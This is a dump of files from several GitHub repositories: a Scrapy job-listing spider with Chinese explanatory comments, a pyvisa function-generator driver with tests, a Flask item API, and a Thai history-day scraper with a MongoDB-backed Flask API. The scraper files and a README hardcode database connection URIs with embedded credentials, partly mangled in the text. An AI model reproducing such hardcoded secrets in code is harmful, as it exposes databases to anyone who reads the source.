"path": "/README.md",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# ArticleSpider\n学习scrapy\n"
},
{
"alpha_fraction": 0.4680851101875305,
"alphanum_fraction": 0.5106382966041565,
"avg_line_length": 30,
"blob_id": "55fd07d9415075571a9af037fc6412c33a9b4836",
"content_id": "14ab004aa45b243bb8b859ec506f65fe71c55cb7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 3,
"path": "/ArticleSpider/utils/yuc.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "\nwith open('aa.txt', 'w') as f:\n for each in range(1, 101):\n f.write(str(each)+',')\n"
},
{
"alpha_fraction": 0.625685453414917,
"alphanum_fraction": 0.6314574480056763,
"avg_line_length": 55.803279876708984,
"blob_id": "ccd4366eebd9257fc3db0051362c748f3fbf4f51",
"content_id": "08ed88b9bc9b4ea84739f29242ea21a34c80b343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9442,
"license_type": "no_license",
"max_line_length": 262,
"num_lines": 122,
"path": "/ArticleSpider/spiders/lagou.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.loader import ItemLoader\nfrom items import LagouJobItem, LagouJobItemLoader\nfrom utils.common import get_md5\nimport datetime\n\n\nclass LagouSpider(CrawlSpider):\n name = 'lagou'\n allowed_domains = ['www.lagou.com']\n start_urls = ['https://www.lagou.com/']\n\n '''\n CrawlSpider基于Spider,相比普通的Spider它可以智能提取页面中的所有的链接,并且下载这些页面,供我们解析处理\n 我们只需要写一个规则,说明什么样的链接做什么样的处理就可以了,\n 在规则中我们可以指定某个callback函数对某一类链接对处理,不指定callback函数默认操作是提取当前页面对链接并下载\n 当然是否提取链接还是由规则中的follow参数决定,True就提取,False不提取\n 没有指定follow参数时,follow参数的默认值由是否指定callback函数决定,\n 有callback就False,无callback就True(源码这么写的:self.follow = False if callback else True)\n 关于的CrawlSpider流程:\n 1。还是先执行start_requests对start_urls里对每一个URL发起请求\n 2。请求回来的response被默认的parse方法接收处理,parse方法CrawlSpider已经定义好了,我们不可以重写覆盖\n 3。定义好的parse做了如下处理:\n return self._parse_response(response, self.parse_start_url, cb_kwargs={}, follow=True)\n 调用了CrawlSpider的一个核心方法_parse_response,其中参数parse_start_url是一个callback函数,它是CrawlSpider预先定义的一个空方法\n 我们可以重写这个方法来处理response,也可以不重写继续执行CrawlSpider为我们提供的功能\n _parse_response方法是CrawlSpider的核心,会被多次调用,这里只是为了代码复用而调用了一次\n 4。_parse_response方法:def _parse_response(self, response, callback, cb_kwargs, follow=True):\n a。先判断是否有callback函数,没有则跳过这步\n 调用callback方法处理response,处理的结果再传到process_results方法进一步处理\n process_results是CrawlSpider提供的一个空方法,我们可以根据自己的需求决定是否重写这个方法\n b。判断是否继续从response里提取url,\n 是否提取由两个参数共同决定,一个是传入的follow参数,另一个是setting文件中CRAWLSPIDER_FOLLOW_LINKS的值,True or False,\n 调用_requests_to_follow方法做后续提取等主要操作\n 5。_requests_to_follow方法:def _requests_to_follow(self, response):\n 这个方法里就用到了我们自定义的提取url的规则\n 规则如何定义:\n 通过定义CrawlSpider对象的rules属性,它是规则类Rule的一个集合,可以写多个Rule类放在里面,一个Rule就是一个规则\n rules = (\n Rule(LinkExtractor(allow='zhaopin/.*'), follow=True),\n Rule(LinkExtractor(allow='jobs/\\d+.html'), callback='parse_job', follow=True),\n )\n Rule类有这些参数(link_extractor, callback=None, cb_kwargs=None, follow=None, process_links=None, process_request=identity)\n link_extractor:是一个LinkExtractor类,它定义了需要提取的URL的规则\n LinkExtractor类有这些参数(allow=(), deny=(), allow_domains=(), deny_domains=(), restrict_xpaths=(), tags=('a', 'area'), attrs=('href',), canonicalize=False, unique=True, process_value=None, deny_extensions=None, restrict_css=(), strip=True)\n 很多参数,但是大部分不需要我们指定,都默认即可,这里说明几个常用参数:\n allow:这个是正则表达式字符串,也可以是正则表达式字符串的元祖,满足的值会被提取,如果为空,则全部匹配。\n deny:与allow相反,满足的不会被提取\n allow_domains:会被提取的链接的domains\n deny_domains:一定不会被提取链接的domains\n restrict_xpaths:使用xpath表达式,和allow共同作用过滤链接,比如只提取正文内的链接,可以在这里选择正文部分\n restrict_css:使用css选择器,和restrict_xpaths作用一样\n callback:符合规则的页面下载回来后用哪个函数处理,不传不处理,这里需要传字符串\n cb_kwargs:自定义的参数,会作为参数传入到callback函数里\n follow:是否继续获取当前页面的链接\n 上面这三个参数后续会作为参数传入_parse_response函数处理\n process_links:需要传入一个自定义方法的名称的字符串,在_requests_to_follow方法中被调用,发送请求之前调用,多用于URL的再加工\n process_request:需要传入一个自定义方法名称的字符串,根据url创建request类后,这个request会作为参数传入这个方法,多用来处理request类\n 注意callback,process_links,process_request这三个参数需要传入方法名称的字符串,\n 不能传入方法名称,CrawlSpider在初始化时会调用_compile_rules方法,这个方法将rules浅拷贝为_rules,同时将这三个字符串转换为方法,具体怎么转的看源码\n 以上就是关于规则的定义方法,以及CrawlSpider如何获取这些rules\n process_request会逐个处理这些Rule\n a。首先根据LinkExtractor类定义的URL规则提取出页面中的URL\n b。然后有一个去重操作,对当前页面的URL进行去重\n c。如果自定义了process_links方法,则调用process_links方法处理url\n d。接着调用_build_request方法,这个方法用来构建一个request,并返回这个request\n e。返回的request会被process_request函数处理,如果定义了process_request函数的话\n f。process_request函数必须返回一个request或None\n g。最后本方法yield出去这个request或者None,yield出去这个request的callback是_response_downloaded方法\n 
h。_response_downloaded方法\n 会将这个response和rule规则里的callback、cb_kwargs、follow这个四个作为参数调用_parse_response方法\n i。又回到了_parse_response方法\n \n 总结一下可以让我重构的方法:\n parse_start_url\n process_results\n process_links\n process_request\n '''\n\n # 这个是spider类的一个属性,可以自定义setting文件的配置,也可以在setting文件里直接配置\n custom_settings = {\n \"COOKIES_ENABLED\": False,\n \"DOWNLOAD_DELAY\": 1,\n # 'DEFAULT_REQUEST_HEADERS': {\n # 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n # }\n }\n\n rules = (\n # Rule(LinkExtractor(allow='zhaopin/.*'), follow=True),\n # Rule(LinkExtractor(allow='gongsi/.*'), follow=True),\n Rule(LinkExtractor(allow='jobs/\\d+.html'), callback='parse_job', follow=True),\n )\n\n def parse_job(self, response):\n item_loader = LagouJobItemLoader(LagouJobItem(), response)\n item_loader.add_value('url', response.url)\n item_loader.add_value('url_object_url', get_md5(response.url))\n item_loader.add_css('title', '.job-name::attr(title)')\n item_loader.add_css('salary', '.job_request span.salary::text')\n item_loader.add_css('job_city', '.job_request span:nth-child(2)::text')\n # xpath选择第二个这么写\n # item_loader.add_xpath('job_city', '//*[@class=\"job_request\"]/p/span[2]/text()')\n item_loader.add_css('work_year', '.job_request span:nth-child(3)::text')\n item_loader.add_css('degree_need', '.job_request span:nth-child(4)::text')\n item_loader.add_css('job_type', '.job_request span:nth-child(5)::text')\n item_loader.add_css('publish_time', '.publish_time::text')\n item_loader.add_css('tags', '.position-label li::text')\n item_loader.add_css('job_advantage', '.job-advantage p::text')\n item_loader.add_css('job_desc', '.job_bt div')\n item_loader.add_css('job_addr', '.work_addr a:not(#mapPreview)::text, .work_addr::text')\n # item_loader.add_css('job_addr', '.work_addr')\n item_loader.add_css('company_url', '.job_company dt a::attr(href)')\n item_loader.add_css('company_name', '.job_company dt a img::attr(alt)')\n item_loader.add_value('crawl_time', datetime.datetime.now())\n\n job_item = item_loader.load_item()\n return job_item\n"
}
] | 13 |
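The lagou.py comments above walk through how CrawlSpider's Rule and LinkExtractor machinery fits together. Below is a minimal self-contained sketch of that pattern; the domain, URL regexes and yielded fields are hypothetical placeholders, not part of the ArticleSpider project:

```python
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule


class ExampleSpider(CrawlSpider):
    name = 'example'
    allowed_domains = ['example.com']
    start_urls = ['http://example.com/']

    rules = (
        # No callback: just follow listing pages and keep extracting links from them.
        Rule(LinkExtractor(allow=r'category/.*'), follow=True),
        # Callback named as a string (what _compile_rules expects): download matching
        # detail pages and hand each response to parse_item via _response_downloaded.
        Rule(LinkExtractor(allow=r'items/\d+\.html'), callback='parse_item', follow=True),
    )

    def parse_item(self, response):
        # Runs inside _parse_response once the rule's page has been downloaded.
        yield {'url': response.url, 'title': response.css('title::text').extract_first('')}
```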
dmeiburg/softlab
|
https://github.com/dmeiburg/softlab
|
a4730e42601dfeb25fc97120299dbbe246f87694
|
5d9e780a49590d09022abc7360d60d0ce2627521
|
54073a7e4f37d274b229c04cac420a563a35fbea
|
refs/heads/master
| 2021-03-02T07:13:02.295329 | 2020-03-09T00:31:31 | 2020-03-09T00:31:31 | 245,846,255 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5609756112098694,
"alphanum_fraction": 0.5698447823524475,
"avg_line_length": 22.736841201782227,
"blob_id": "4e152c472d1149c7824c4366c7a7250ecb8b2a23",
"content_id": "b74990a1c35da84eac8808010c8cec28c4fb90dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/softlab/sdg_function_generator.py",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "\"\"\"Implements interface for Siglent SDG2000X function generators\"\"\"\n\nimport pyvisa\n\n\nclass SDGFunctionGenerator():\n \"\"\"Class with methods to controll Siglent SDG2000X function generators.\n\n Attributes\n ----------\n device: pyvisa.resources.TCPIPInstrument\n \"\"\"\n\n def __init__(self, ip):\n \"\"\"Establishes connection to device\n\n Parameters\n ----------\n ip : string\n ip address of the function generator\n \"\"\"\n rm = pyvisa.ResourceManager()\n self.device = rm.open_resource(\"TCPIP::{}\".format(ip))\n\n def query(self, scpi):\n \"\"\"Sends SCPI command to device and returns response.\n\n Parameters\n ----------\n scpi : string\n SCPI command\n \"\"\"\n return self.device.query(scpi)\n\n def idn(self):\n \"\"\"Gets device identification.\n \"\"\"\n return self.query(\"*IDN?\")\n"
},
{
"alpha_fraction": 0.5980629324913025,
"alphanum_fraction": 0.6283292770385742,
"avg_line_length": 24.030303955078125,
"blob_id": "c6ec2cc85c25221ce3133a5ded716dafba825385",
"content_id": "1b4906e6528ab0c13d33be1e90acb0c49dd11c5f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 826,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 33,
"path": "/tests/test_sdg_function_generator.py",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "import pytest\n\nfrom softlab.sdg_function_generator import SDGFunctionGenerator\n\n\nclass MockFunctionGenerator:\n def query(q):\n responses = {\"*IDN?\": (\"Siglent Technologies,SDG2122X,\"\n \"SDG2XCAQ2R1992,\"\n \"2.01.01.23R8\\n\")}\n return responses[q]\n\n\[email protected](scope=\"module\")\ndef fg(monkeysession, run_on_hardware):\n\n def mock_init(*args, **kwargs):\n pass\n\n ip = \"10.0.10.67\"\n\n if run_on_hardware:\n function_generator = SDGFunctionGenerator(ip)\n else:\n monkeysession.setattr(SDGFunctionGenerator, \"__init__\", mock_init)\n function_generator = SDGFunctionGenerator(ip)\n function_generator.device = MockFunctionGenerator\n\n return function_generator\n\n\ndef test_get_idn(fg):\n assert 'SDG' in fg.idn()\n"
},
{
"alpha_fraction": 0.7534246444702148,
"alphanum_fraction": 0.7534246444702148,
"avg_line_length": 169.3333282470703,
"blob_id": "8e36586c65bee956aa5c2abfd9fcaad2f193c1da",
"content_id": "35976b6ae561ea050056c06fd6fb52c64daae0ec",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 498,
"num_lines": 3,
"path": "/README.md",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "## Softlab\n\n[](https://drone.dmeiburg.de/dm/softlab) [](https://codecov.io/gh/dmeiburg/softlab) [](https://github.com/pre-commit/pre-commit) [](https://opensource.org/licenses/MIT)\n"
},
{
"alpha_fraction": 0.6873614192008972,
"alphanum_fraction": 0.6873614192008972,
"avg_line_length": 22.736841201782227,
"blob_id": "f242dba06c58fb2818ae67c941d2427b0c410c81",
"content_id": "0cf6c07d2146da768b54a6c1cb941e1824b93dbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 19,
"path": "/tests/conftest.py",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "import pytest\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--hw\", action=\"store_true\", default=False,\n help=\"run test agains real hardware\")\n\n\[email protected](scope=\"module\")\ndef run_on_hardware(request):\n return request.config.getoption(\"--hw\")\n\n\[email protected](scope=\"session\")\ndef monkeysession(request):\n from _pytest.monkeypatch import MonkeyPatch\n mpatch = MonkeyPatch()\n yield mpatch\n mpatch.undo()\n"
}
] | 4 |
feifengcai/david-heroku-1
|
https://github.com/feifengcai/david-heroku-1
|
85eb7879ff54a8b4448c4d8864ea22bae95d786f
|
c35bc22cd7387c6547fdb6c99f6ae1d24080e73e
|
135c3a0a964e6a30491de35a9ededaf06dd578a6
|
refs/heads/master
| 2020-04-05T06:56:43.427002 | 2018-11-14T00:51:11 | 2018-11-14T00:51:11 | 156,657,729 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5425853729248047,
"alphanum_fraction": 0.5520968437194824,
"avg_line_length": 30.630136489868164,
"blob_id": "da013e9c3d0e5c075759b032fc193dd42e635cd4",
"content_id": "051d73f01a5bd85d05cec6077cc5e3b43ed1d53c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2313,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 73,
"path": "/resources/item.py",
"repo_name": "feifengcai/david-heroku-1",
"src_encoding": "UTF-8",
"text": "import sqlite3\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\nfrom models.item import ItemModel\n\n\nclass Item(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('price', type=float, required=True, help=\"field is required\")\n parser.add_argument('store_id', type=int, required=True, help=\"Every item needs a store id.\")\n\n @jwt_required()\n def get(self, name):\n item = ItemModel.find_by_name(name)\n if item:\n return item.json()\n return {'message': 'Item not found'}, 404\n\n def post(self, name):\n if ItemModel.find_by_name(name):\n return {'message': \"An item with name '{}' already exists.\".format(name)}, 400\n\n data = Item.parser.parse_args()\n #item = ItemModel(name, data['price'], data['store_id'])\n item = ItemModel(name, **data)\t\t\n print(item)\n try:\n item.save_to_db()\n except:\n return {\"message\": \"An error in inserting item.\"}, 500 # internal server error\n\n return item.json(), 201\n\n @jwt_required()\n def delete(self, name):\n item = ItemModel.find_by_name(name)\n if item:\n item.delete_from_db()\n return {'message': \"item '{}' is deleted.\".format(name)}, 200\n\n @jwt_required()\n def put(self, name):\n data = Item.parser.parse_args()\n item = ItemModel.find_by_name(name)\n status = 200\n if item and item.price == data['price']:\n return {'message': \"Nothing to update.\"}, status\n\n if item is None:\n item = ItemModel(name, data['price'], data['store_id'])\n status = 201\n else:\n item.price = data['price']\n item.save_to_db()\n return item.json(), status\n\n\nclass ItemList(Resource):\n def get(self):\n #return {'items': list(map(lambda x:x.json(), ItemModel.query.all()))}\n return {'items': [x.json() for x in ItemModel.query.all()]}\n '''\n def get(self):\n items = ItemModel.query.all()\n print (\"----\", type(items), items)\n r = []\n for x in items:\n print(\"----\", type(x), x, x.json())\n print(\"----\", x.name, x.price)\n r.append(x.json())\n print (\"----\", r)\n return {'items': r}\n '''\n\n\n\n\n"
}
] | 1 |
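The Item resource above depends on route registration that is not part of this excerpt. For context, this is how a Flask-RESTful resource of that shape is typically wired into an app; the route paths and the commented import are illustrative assumptions, not this repository's verified configuration:

```python
from flask import Flask
from flask_restful import Api
# from resources.item import Item, ItemList  # hypothetical import path

app = Flask(__name__)
api = Api(app)

# URL parameters such as <string:name> are passed into get/post/put/delete as `name`.
# api.add_resource(Item, '/item/<string:name>')
# api.add_resource(ItemList, '/items')

if __name__ == '__main__':
    app.run(debug=True)
```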
scrape-python-supasun/api-heroku-pymongo
|
https://github.com/scrape-python-supasun/api-heroku-pymongo
|
a98ba13e418ab21954081749d36c4efecedc2677
|
69e7299662d42239fbef13e440263ca9b900c642
|
9a028eab0630daabe7f43bf4ab85a00560987e2a
|
refs/heads/master
| 2022-10-23T22:25:17.940507 | 2018-11-13T16:14:36 | 2018-11-13T16:14:36 | 157,397,116 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4790697693824768,
"alphanum_fraction": 0.6930232644081116,
"avg_line_length": 15.538461685180664,
"blob_id": "bcbd5e4a483e14cb97e52baf6cdd46d73d8056f5",
"content_id": "96050c77f43bead34b4a265fe2e1c4b01cac15d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 26,
"path": "/requirements.txt",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "absl-py==0.6.1\naniso8601==4.0.1\nastor==0.7.1\nClick==7.0\nFlask==1.0.2\nFlask-PyMongo==2.2.0\nFlask-RESTful==0.3.6\ngast==0.2.0\ngrpcio==1.16.0\ngunicorn==19.9.0\nh5py==2.8.0\nitsdangerous==1.1.0\nJinja2==2.10\nKeras-Applications==1.0.6\nKeras-Preprocessing==1.0.5\nMarkdown==3.0.1\nMarkupSafe==1.1.0\nnumpy==1.15.4\nprotobuf==3.6.1\npymongo==3.7.2\npytz==2018.7\nsix==1.11.0\ntensorboard==1.12.0\ntensorflow==1.12.0\ntermcolor==1.1.0\nWerkzeug==0.14.1\n"
},
{
"alpha_fraction": 0.6937573552131653,
"alphanum_fraction": 0.7320376634597778,
"avg_line_length": 61.85185241699219,
"blob_id": "ce55b7f9054dc16aadf597e9ad3c6cc6e30683f2",
"content_id": "fbaa739359d1e621743d6284ae242cfa5c381e89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5512,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 54,
"path": "/README.md",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "\"# api-heroku-pymongo\" \nสิ่งที่รู้เท่าที่จำได้\n1.เครื่อมือที่ใช้มี virtualenv โดยใช้Scripts\\activateตลอดเวลา เเล้วใช้pip freezeเพื่อดูว่าเรามีอะไรบ้างอย่างในที่นี้ต้องโหลด\npip install flask_restful, pip install flask, pip install flask_pymongo, pip install gunicorn โดยทั้ง4เอามาจากfromของไฟล์addapihistoryday.pyต้องทำหลังคำสั่งScripts\\activate\nจากนั้นใช้คำสั้ง pip freeze ว่ามี4อันที่เราต้องการไหม จากนั้นใช้คำสั่ง pip freeze > requirements.txt\nhttps://medium.com/@nonthakon/virtualenv-%E0%B9%83%E0%B8%99-python-3-windows-10d3dd89a0a7\n2.gunicorn คือไฟล์ที่เอาไฟล์เราเชื่อมต่อapi เช่นในไฟล์gunicornเรา คำสั่งweb: gunicorn addapihistoryday:app ให้เปลี่ยนเเค่ addapihistorydayตามซื่อไฟล์ที่เราจะเชื่อมกับapi\n3.ไฟล์นี้ถ้าลงapiในherokuจะได้https://historyday.herokuapp.com/calendar?date=1208 เเต่ถ้าใช้คำสั่งpython ตามด้วยซื่อไฟล์apiของเรา.pyก็จะได้127.0.0.1/calendar?date=1208 โดยเปนการให้ข้อมูลเกี่ยวกับวันสำคัญ2ตัวเเรกคือวัน2ตัวหลังคือเดือนถ้าไม่เจอวันนั้นคือไม่มีวันสำคัญ\n4.ใช้ heroku logs --tailในการรัน heroku api\n5.ถ้าจะรัน flask จะต้องใช้set FLASK_APP=hello.py โดยhello.pyคือซื่อไฟล์ของเราจากนั้นพิมคำสั่งflask run\n6.beautiful soup # a = soup.find_all(\"a\", attrs={\"class\": \"sister\"}) คือ <a class\"sister\"></a>\nโดยต้องimport\nimport urllib\nfrom bs4 import BeautifulSoup\nimport re\nเเละใช้คำสั่ง\nr = urllib.request.urlopen('http://www.tewfree.com/%E0%B8%A7%E0%B8%B1%E0%B8%99%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B9%84%E0%B8%97%E0%B8%A2/').read() <===คือเว็บที่เราจะดึงข้อมูล\nsoup = BeautifulSoup(r ,'html.parser')\nprint(soup)เพื่อที่จะดูข้อมูลในเว็บ\n7.เราจะใช้pymongoเราต้องเข้าไปที่resourcesของmlabจากนั้น add mlabเเล้วกดไปที่setting กดที่reveal config vars จากนั้นก็อปไปไฟล์ที่เราจะเชื่อมกับpymongoก็คือhistoryday.pyโดยพิมคำสั่งเข้าไปเช่น\nimport pymongo\nfrom pymongo import MongoClient\nuri = \"mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1\" <==ดูจากsetting กดที่reveal config vars\nclient = MongoClient(uri)\ndb = client[\"heroku_x8cpgsr1\"]\ncollections = db['historyday'] <==ถานข้อมูลซื่อ\nเเล้วใช้function คือ databaseHistoryDay() ในไฟล์history.day\n8.โดยฟังชั่นHeaderDayHistory()คือหัวข้อ, contentDayHistory()คือเนื้อหา, numberOfDetail()ลำดับid,allDataHistoryDay() คือรวมทั้ง3ฟังชั่น ,ฟั่งชั้นdatabaseHistoryDay()คือดึงเข้าpymongoโดยสามารถดูได้ทางmlab\n=======================================================\nไฟล์addapihistoryday\n1.app.config['MONGO_URI'] = 'mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1'<==ดูจากsetting กดที่reveal config \n2.ฟังชั่นdateเเปลงurlเปน4ตัวเช่นhttps://historyday.herokuapp.com/calendar?date=1208 1208คือตัวที่เราจะเเสดง\nโดยมีฟังชั้น\nparser = reqparse.RequestParser()\nparser.add_argument('date', type=str)<===คือuriเว็บตัวdate==\n3.ในฟังชั่น calendarDay คือเชื่อมapi heroku\nโดยใช้\nargs = parser.parse_args()\ncalendar = args['date'] # เอาค่าฟังชั่นเก็บในcalendar\n4.\ntry:\n query = {\"contentData\": date(calendar)} <==เอาฟังชั่นมาใช้\n projection = {'_id':False}<==ไม่เอา_idเพราะไม่จำเป็น\n historyData = mongo.db.historyday.find(query, projection)รวมทั้งสอง\n return jsonify(historyData[0])<==ต้องทำให้มันออกมาจากlist\nexcept:\n return 'Not found'<==หาไม่เจอurlให้ปริ้นอันนี้\n \n5.api.add_resource(calendarDay, '/calendar')<==คือตัวcalendar https://historyday.herokuapp.com/calendar?date=1208\n6.พิม\nif __name__ == '__main__':\n app.run(debug=True)\n \n****อย่าลืม กด deployในherokuเเล้วpushเหมือนgithub\n\n\n"
},
{
"alpha_fraction": 0.6809148788452148,
"alphanum_fraction": 0.7094113230705261,
"avg_line_length": 31.08433723449707,
"blob_id": "cc389f6ff303d3a8314a563004f23667d2a0b859",
"content_id": "13137ed0c73459627edcdecf21d30848b7710699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2717,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 83,
"path": "/historyday.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "# languague : beautihulsoup\nimport urllib\nfrom bs4 import BeautifulSoup\nimport re\n# languague : beautihulsoup\n\n# languague : pymongo\nimport pymongo\nfrom pymongo import MongoClient\nuri = \"mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1\"\nclient = MongoClient(uri)\ndb = client[\"heroku_x8cpgsr1\"]\ncollections = db['historyday']\n# languague : pymongo\n# languague : beautihulsoup\nr = urllib.request.urlopen('http://www.tewfree.com/%E0%B8%A7%E0%B8%B1%E0%B8%99%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B9%84%E0%B8%97%E0%B8%A2/').read()\nsoup = BeautifulSoup(r ,'html.parser')\n# \n# print(soup)\n\n# a = soup.find_all(\"a\", text=\"วันที\")\n# a = soup.find_all(\"a\", attrs={\"class\": \"sister\"})\n# header = soup.html.find_all(\"strong\")\n# content = soup.find_all(\"div\", attrs={\"class\": \"entry-content-inner medium-10 columns small-12 content-inner-between\"})\n\n# languague : beautihulsoup\n# languague : python\ndef HeaderDayHistory():\n allDataHistoryDay = soup.find_all(\"p\")\n AllListHeader = []\n # print(contentday)\n for element in allDataHistoryDay[4:82]:\n allDataText = element.text\n myListOneData = allDataText.split(\"–\")\n AllHeaderData = myListOneData[1]\n AllListHeader.append(AllHeaderData)\n return AllListHeader\n# HeaderDetail = HeaderDayHistory()\n# print(HeaderDetail)\n\ndef contentDayHistory():\n allDataHistoryDay = soup.find_all(\"p\")\n ListAllContentData = []\n for element in allDataHistoryDay[4:82]:\n allDataText = element.text\n myListOneData = allDataText.split(\"–\")\n AllContentData = myListOneData[0]\n ListAllContentData.append(AllContentData)\n return ListAllContentData\n# contentDetail = contentDayHistory()\n# print(contentDetail)\n\ndef numberOfDetail():\n numberDataList = []\n for element in range(1,79):\n numberOneList = element\n numberDataList.append(numberOneList)\n return numberDataList\n# numberOfData = numberOfDetail()\n\n\ndef allDataHistoryDay():\n HeaderDetail = HeaderDayHistory()\n contentDetail = contentDayHistory()\n numberOfData = numberOfDetail()\n listDataAll = []\n for element in range(0,78):\n mydict = {\"id\":numberOfData[element],\"historyData\":HeaderDetail[element],\"contentData\":contentDetail[element]}\n listDataAll.append(mydict)\n return listDataAll\n\n# allDataDay = allDataHistoryDay()\n# print(allDataDay)\n# languague : python\n# languague : pymongo\ndef databaseHistoryDay():\n allDataDay = allDataHistoryDay()\n result = collections.insert_many(allDataDay)\n result.inserted_ids\n return result\ndatabaseHistoryDay() \n# // ลบคอมเม้นเอาไว้ต่อmlab heroku\n# languague : pymongo\n\n\n\n\n"
},
{
"alpha_fraction": 0.39517056941986084,
"alphanum_fraction": 0.47566115856170654,
"avg_line_length": 21.110170364379883,
"blob_id": "7c6949f34f09d98e46b5706dc6f1ff627ed24682",
"content_id": "86abaa5cc7be2e1d94706556be9c5fb2c8f1d1d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2835,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 118,
"path": "/addapihistoryday.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "from flask_restful import Resource, Api, reqparse\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_pymongo import PyMongo\nimport json\n\nfrom bson.json_util import dumps\n\n\n# วิธีรัน \n# 1.set FLASK_APP=addapihistoryday.py\n# 2.flask run\n\napp = Flask(__name__)\napp.config['MONGO_URI'] = 'mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1'\nmongo = PyMongo(app)\napi = Api(app)\n\n# user = mongo.db.historyday.find_one_or_404({\"historyData\":HeaderDetail[element]})\n\nparser = reqparse.RequestParser()\nparser.add_argument('date', type=str)\n# dictp = parser.parse_args()\ndef date(date):\n day = date[:2]\n month = date[2:]\n mouthList = {\n \"01\": \"มกราคม\",\n \"02\": \"กุมภาพันธ์\",\n \"03\": \"มีนาคม\",\n \"04\": \"เมษายน\",\n \"05\": \"พฤษภาคม\",\n \"06\": \"มิถุนายน\",\n \"07\": \"กรกฎาคม\",\n \"08\": \"สิงหาคม\",\n \"09\": \"กันยายน\",\n \"10\": \"ตุลาคม\",\n \"11\": \"พฤศจิกายน\",\n \"12\": \"ธันวาคม\"\n }\n dayList = {\n \"01\":\"1\",\n \"02\":\"2\",\n \"03\":\"3\",\n \"04\":\"4\",\n \"05\":\"5\",\n \"06\":\"6\",\n \"07\":\"7\",\n \"08\":\"8\",\n \"09\":\"9\",\n \"10\":\"10\",\n \"11\":\"11\",\n \"12\":\"12\",\n \"13\":\"13\",\n \"14\":\"14\",\n \"15\":\"15\",\n \"16\":\"16\",\n \"17\":\"17\",\n \"18\":\"18\",\n \"19\":\"19\",\n \"10\":\"10\",\n \"11\":\"11\",\n \"12\":\"12\",\n \"13\":\"13\",\n \"14\":\"14\",\n \"15\":\"15\",\n \"16\":\"16\",\n \"17\":\"17\",\n \"18\":\"18\",\n \"19\":\"19\",\n \"20\":\"20\",\n \"21\":\"21\",\n \"22\":\"22\",\n \"23\":\"23\",\n \"24\":\"24\",\n \"25\":\"25\",\n \"26\":\"26\",\n \"27\":\"27\",\n \"28\":\"28\",\n \"29\":\"29\",\n \"30\":\"30\",\n \"31\":\"31\",\n }\n if day in dayList and month in mouthList:\n return dayList[day] + ' ' + mouthList[month] + ' '\n\n\n\nclass calendarDay(Resource):\n def get(self):\n # calendar = date(date)\n args = parser.parse_args()\n calendar = args['date']\n # เอาค่ามาเก็บในcalendar\n # return \"Input is {}\".format(date(calendar))\n try:\n query = {\"contentData\": date(calendar)}\n projection = {'_id':False}\n historyData = mongo.db.historyday.find(query, projection)\n return jsonify(historyData[0])\n except:\n return 'Not 